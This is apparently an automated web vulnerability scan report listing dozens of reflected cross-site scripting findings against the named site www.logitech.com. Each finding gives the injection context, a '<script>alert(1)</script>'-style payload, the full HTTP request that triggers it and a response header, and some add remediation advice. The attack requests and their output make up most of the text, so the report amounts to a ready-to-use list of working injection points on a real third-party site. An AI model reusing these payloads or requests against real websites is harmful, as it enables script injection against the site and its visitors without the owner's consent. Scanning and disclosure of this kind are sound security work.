HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d1b5"><script>alert(1)</script>c3b9f6159b8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/gaming/wheels2d1b5"><script>alert(1)</script>c3b9f6159b8 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83fa3</script><script>alert(1)</script>9da708a5ba5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/gaming/wheels83fa3</script><script>alert(1)</script>9da708a5ba5 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d559d"%3b361efc32e78 was submitted in the REST URL parameter 1. This input was echoed as d559d";361efc32e78 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-usd559d"%3b361efc32e78/hd-webcams/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Server: Apache AK-control: no-store Date: Fri, 12 Nov 2010 13:01:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82b0d"><script>alert(1)</script>6a6fb838bfe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us82b0d"><script>alert(1)</script>6a6fb838bfe/hd-webcams/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ec07</script><script>alert(1)</script>33925e71728 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2ec07</script><script>alert(1)</script>33925e71728/hd-webcams/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4348b</script><script>alert(1)</script>8c976b75c1b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/hd-webcams4348b</script><script>alert(1)</script>8c976b75c1b/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 572a9"><script>alert(1)</script>3e449f85788 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/hd-webcams572a9"><script>alert(1)</script>3e449f85788/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78c27</script><script>alert(1)</script>2a81bba4019 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /78c27</script><script>alert(1)</script>2a81bba4019/hd-webcams/fluid-motion HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 245e5"><script>alert(1)</script>f06c63aebb0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us245e5"><script>alert(1)</script>f06c63aebb0/hd-webcams/fluid-motion HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3868c"%3b5cdb4bb3999 was submitted in the REST URL parameter 1. This input was echoed as 3868c";5cdb4bb3999 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us3868c"%3b5cdb4bb3999/hd-webcams/fluid-motion HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e35e0</script><script>alert(1)</script>15769ef0489 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/hd-webcamse35e0</script><script>alert(1)</script>15769ef0489/fluid-motion HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edf62"><script>alert(1)</script>0fae756487d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/hd-webcamsedf62"><script>alert(1)</script>0fae756487d/fluid-motion HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24a9b"><script>alert(1)</script>2fed7bcc2a6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/hd-webcams/fluid-motion24a9b"><script>alert(1)</script>2fed7bcc2a6 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77268</script><script>alert(1)</script>817d4397615 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/hd-webcams/fluid-motion77268</script><script>alert(1)</script>817d4397615 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63316</script><script>alert(1)</script>993a85318aa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /63316</script><script>alert(1)</script>993a85318aa/home HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c5e0"><script>alert(1)</script>59b06a7943e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us8c5e0"><script>alert(1)</script>59b06a7943e/home HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 263bd"><script>alert(1)</script>770631fc56f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/home263bd"><script>alert(1)</script>770631fc56f HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4faeb</script><script>alert(1)</script>6c638539df9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/home4faeb</script><script>alert(1)</script>6c638539df9 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a54d5</script><script>alert(1)</script>06ee8092f3e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /a54d5</script><script>alert(1)</script>06ee8092f3e/home/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53752"><script>alert(1)</script>93fddd2f0d6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us53752"><script>alert(1)</script>93fddd2f0d6/home/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e874"><script>alert(1)</script>bbbfbd48696 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/home8e874"><script>alert(1)</script>bbbfbd48696/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f012a</script><script>alert(1)</script>e8c01b458fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/homef012a</script><script>alert(1)</script>e8c01b458fe/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 742ba</script><script>alert(1)</script>439290ff610 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /742ba</script><script>alert(1)</script>439290ff610/home/my-account HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41228"><script>alert(1)</script>d31a477682b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us41228"><script>alert(1)</script>d31a477682b/home/my-account HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74907</script><script>alert(1)</script>b4b8b48df26 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/home74907</script><script>alert(1)</script>b4b8b48df26/my-account HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fcc9"><script>alert(1)</script>780ef4af128 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/home6fcc9"><script>alert(1)</script>780ef4af128/my-account HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62bd4</script><script>alert(1)</script>37a2f9101fd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/home/my-account62bd4</script><script>alert(1)</script>37a2f9101fd HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:32 GMT Connection: close
